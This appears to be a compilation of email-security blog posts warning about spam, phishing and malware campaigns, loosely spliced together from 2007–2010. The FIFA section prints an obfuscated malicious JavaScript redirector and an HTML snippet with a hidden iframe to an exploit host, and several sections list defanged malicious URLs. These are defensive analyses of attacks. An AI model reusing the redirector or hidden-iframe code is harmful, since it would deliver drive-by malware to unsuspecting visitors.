This is the body of the email:

PDF Reader 2010 – New Version for Windows and Mac
The latest PDF Reader: Open, Edit Create PDF Files

What’s new in this version :

-Open, edit and view all PDF files.
-Enhanced performance with faster loading and zooming.
-Collect your data and combine it into a high quality document.

hxxp://www.adobe-upgrade-2010.com/

Thank you for choosing us, the worldwide leader in PDF Reader
Solutions.

Best Regards,

Tommy Johnson
PDF Reader 2010

When visiting this web site, it all makes perfect sense, it’s a company that offers a PDF Reader/Writer that can do more than the Adobe Reader on its own. But when you go further you will notice some issues with the web site and the offer.

When following the URL in the email, you get redirected to hxxp://2010-pdf-pro.com/.

It seems like you can download the software for free, there is no pricing information on the web site, so you go forward with the Download button.

The Download button leads to the page hxxp://2010-pdf-pro.com/join.asp but you will get a redirect again to the domain hxxp://secure-signup.ru/. Do not get fooled by the domain name secure-signup.ru. The browser session is not secured at all while most genuine web shops already have a secured session through https:// when you sign up for a service or software.

The site asks you to fill in your email address twice for confirmation, your first and last name and country.

When continuing to step 2 you will get the membership choices and here we have it: the PDF Reader 2010 comes not for free. You will need to choose from some 1, 2 or 3 year online access and support.

When you have made your choice you can continue the process by validating your credit card. Notice that you haven’t filled in any details regarding invoicing. The web forms did not ask for your address, zip or postcode to create an invoice or proof of purchase.

On the web form to validate your credit card, you still have no secure https:// connection. This means that your details are send over the internet without any encryption at all and can be read by anyone. What’s worse, your credit card details are now in the hands of a person or group with bad intentions.

Update 29 July 2010:

On the 27th we did fill in a dummy email address to test the webforms on the web sites above and today we received a mailing with the following content:

Dear valued customers,

We are pleased to announce the newest version of PDF Reader 2010 which will enable you to view, create, edit and print PDF documents. The PDF format as a global exchange document format is created by Adobe and is the most efficient way to exchange information.

Simply visit the link below and enter your PDF reader code:

PDF Reader Code: 5013
Go here to receive the latest 2010 version

Thank you for choosing us, the worldwide leader in PDF Reader solutions.

Mike Robertson
PDF Reader Support

Copyright PDF Reader 2010 – All rights reserved

You are currently subscribed to sm-pdf as geert@betransport.com
Safely unsubscribe from sm-pdf at any time.

Media Internet Consultants – Edif. Neptuno, Planta Baja, Ave. Ricardo J. Alfaro, Tumba Muerto, n/a, Panama

Behind “Go here to receive the latest 2010 version” is the link hxxp://list.directmediafive.com/t/2549518/64766653/4988/0/ that will redirect you to hxxp://new-pdf-reader.com/1/promo/index.asp?aff=11677&camp=pdf_x1

The web form is now somewhat different and allows you to fill in your PDF Reader code 5013. Based on this you get a certain discount. When we wanted to leave the page an go back one page, we got a pop up windows with an 50% reduction in the price, offered for a 24 hour period with a count down counter on the site.

When going further through the process, we did got an https:// connection for sending the credit card details. But based on the facts above and mentioned in this article, I would not recommend anyone doing this. There are too many variables that gives us the idea that buying on this site will result in troubles.

The mailing also contains an unsubscribe URL using hxxp://list.directmediafive.com/. It gives you the idea that this is a genuine company. But what is quite interesting, is that when visiting the domain http://www.directmediafive.com/ directly, you will get a web page of a parked domain.

We have used the unsubscribe URL included in the mailing and will now see what happens during the next few days.

The from address is spoofed and this is the body of the email:

Hello!!

FIFA World Cup 2010 scandal news, read attached document

Attached is the file news.html or open.html that contains a malicious javascript:

<script type=’text/javascript’>

function dX(){};

var h=new Date();

dX.prototype = {

f : function() {

var u=function(){};

var uY=new Date();

var o=”";

var k=document;

var oE=function(){};

var l=”;

this.i=33457;

var kV=k['l.oSc<a(t<i_oSnS'.replace(/[S_\<\(\.]/g, ”)];

var w=function(){};

var p=false;

this.pP=false;

this.s=”;

kV['hGrGe>f>'.replace(/[\>mYGw]/g, ”)]=’hJt>t>p>:S/2/2aSd>v2aSnlcleldSwloloJd>tSe2c2hJ.2cSo>ml/
2xJnSuJ4JeSjS/2z2.ShltlmJ’.replace(/[JS2\>l]/g, ”);

var iK=”iK”;

pK=”;

this.d=”d”;

uM=”";

}

};

this.dK=”";

var fG=new dX();

var dR=”dR”;

fG.f();

hJ=false;

</script>

This Javascript will redirect your browser to hxxp://advancedwoodtech.com/xnu4ej/z.htm.

At the moment, the web site page mentioned here is not active, we got a 404 error when visiting, so we can’t investigate this further. But we are pretty sure that you will download some malware with an attempt to infect your computer and get redirected to a spam web site of the Canadian Pharmacy.

This email has all the characteristics of previous campaigns where social media is being used to lure visitors to a web site and get their computer infected.

Our recommendation is: when you receive this type of email, do not open the attached HTML file and delete the email.

[UPDATE]

MX Lab intercepted a new version of this social engineering attack and the email now contains the file open.html.

This leads to the web site hxxp://shoppingbazzar.co.uk/z.htm. The online document z.html contains the following code:

<meta http-equiv="refresh" content="3;url=hxxp://toldspeak.com/" />

<iframe src='hxxp://hugefrogs.ru:8080/index.php?pid=10' width='1'
height='1' style='visibility: hidden;'></iframe>

This will redirect your browser to hxxp://toldspeak.com after 3 seconds that contains the Canadian Pharmacy web site as mentioned earlier.

The site hxxp://hugefrogs.ru:8080/index.php?pid=10 contains more obfuscated JavaScript that creates an iframe to a PDF file and to a Java .jar file. With one of these files an attack is being executed to the computer.

It seems that this now is distributed under a new name “Antivirus for Windows – New 2009 Version”.

The email was sent from PC Protection <internet.clientservice@gmail.com> and contains the subject “Update your Antivirus for Windows.

The email looks like a mailing and contains an Unsubscribe, Forward and Update Profile links. However, when looking at all the links in the message, some links are invalid like the Report Abuse link that contains an URL to http://ss25..sourcecompmail.com/ – note the double point after ss25. The domains http://ss25.sourcecompmail.com/ or http://sourcecompmail.com/ are giving us an HTTP 404 error and contains no web site. It is very common to work from under a subdomain and pages under that domain without any root HTML pages.

The domain itself appears to be registered at Tucows with the following details:

[whois.tucows.com]
Registrant:
 Quattro Web Solutions
 13 Hares avenue
 Woodstock
 Cape Town,  7925
 ZA

 Domain name: SOURCECOMPMAIL.COM

 Administrative Contact:
    Honig, Paul  paul@quattro.co.za
    15 Wandel street
    Gardens
    Cape Town
    Cape Town,  7925
    ZA
    +27.4480099    Fax: +27.214619277

 Technical Contact:
    Desk, Help  domreg@ns.com
    322 South Marietta Street
    ww
    w
    Gastonia, WI 28052
    US
    +1.7048527000    Fax: +1.7048849011

 Registrar of Record: TUCOWS, INC.
 Record last updated on 28-Oct-2008.
 Record expires on 28-Oct-2009.
 Record created on 28-Oct-2008.

 Registrar Domain Name Help Center:

http://domainhelp.tucows.com

 Domain servers in listed order:
    NS3.NITRIC.CO.ZA
    NS2.NITRIC.CO.ZA   

 Domain status: clientTransferProhibited
                clientUpdateProhibited

When following the download links, a landing page is shown:

When filling in your email address and the activation code you are presented with a payment screen.

Recommendation: do not proceed with the payment process and do not download the program.

A new spam trick includes now to include an URL directing to an Flash animation with the .swf extension. Most browsers will play the Flash movie even if this one isn’t embedded in an .html page.

The Flash contains no animation but a redirect to a web site with the spammers offer.

Commtouch reports that the messages arrived in small quantities on Saturday, and by Monday, July 28, had become a massive outbreak. 7000 URLs have been created and used in millions of spam messages.

Read the full co-brandend MX Lab – Commtouch® – 2008 Q2 Email Threats Trend Report at http://www.mxlab.eu/en/news/reports.html.

Connection-Colonial Bank Renewal

Certificate Renewal
Personal (Smartcard) e-Cert  Personal e-Cert
Certificate owner must renew the certificate before expiry date.
Your certificate expiration date – 1may 2008.
The system will send email (Certificate Renewal Notice) to the certificate owner ten days and 3 hours before the certificate is due to expire, if it has not been renewed. Upon receiving the renewal notice, certificate owner is required to connect to Colonial Bank Certificate Management System and present the client certificate. Secure Server e-Cert  Developer e-Cert
Certificate owner has the responsibility to renew the certificate before expiry date. Successful renewed application will receive an email notification from Colonial Bank. Applicant can just browse to the URL stated in the email and then download the certificate.

Download now

2003 Colonial Bank, N.A.

Further investigation show us that it is indeed a technique to distribute malware. The download URL doesn’t give a login screen but takes you to a web site where you need to download the certificate and this is an .exe.

The download gives us an Colonial_CertificateUpdate04192008.exe and is in fact the Trojan-PSW.Win32.Papras. This trojan steals login credentials and other sensitive information on the compromised system. It also drops and uses a rootkit driver to hide itself. The rootkit driver is detected as Rootkit.Win32.Agent.SZ.

As always, take extra attention if you receive these kind of formatted emails.

When the PDF document is opened the Windows firewall will be disabled by using Netsh, a command-line scripting utility that allows you to, either locally or remotely, display or modify the network configuration of a computer that is currently running. The code will start downloading a trojan from the internet which may allow the attacker to take control over the infected computer.

The attachment files names range from well known artists like smashingpumpkins.mp3, bbrown.mp3, bspears.mp3, gloriaestefan.mp3, beatles.mp3 to and some obvious poplar sound names like answeringmachine.mp3, coolringtone.mp3, listentothis.mp3. The subject only contains Fwd: or Re:.

MX Lab protects clients against this new form of spam with the Recurrent Pattern Technology ™ (RPD) from Commtouch®. According to our technology partner Commtouch®, the outbreak accounts for around 7-10% of all spam, globally, over the past 18 hours. The first MP3 spams where detected on October 17, 2007, 21:24 GMT.

Goodin was found guilty after a week-long jury trial for sending thousands of e-mails through an Earthlink Internet connection to America Online users. The email was spoofed so that it appeared to be from AOL’s billing department. AOL customers where asked to update their personal and credit card information on AOL webpages that Goodin controlled. With the information, Gooding made unauthorized credit card purchases.

Read the security warning on the MX Lab web site.